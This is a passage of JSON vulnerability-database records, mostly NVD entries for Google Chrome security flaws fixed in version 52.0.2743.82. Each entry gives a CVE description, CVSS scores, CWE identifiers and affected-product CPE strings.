"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5134", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-06-03T14:36:26", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5136", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1707", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1707", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5132", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5132", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:06", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1706", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5128", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:27", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5133", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5133", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1708", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1709", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:sfntly:-", "cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:sfntly:-:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5129", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1710", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1710", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5130", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5131", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2019-03-26T17:14:00", "cpe": ["cpe:/o:suse:linux_enterprise:12.0", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:xmlsoft:libxml2:2.9.4", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2016-5131", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5131", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise:12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:28", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5135", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1711", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5127", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5127", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:06", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 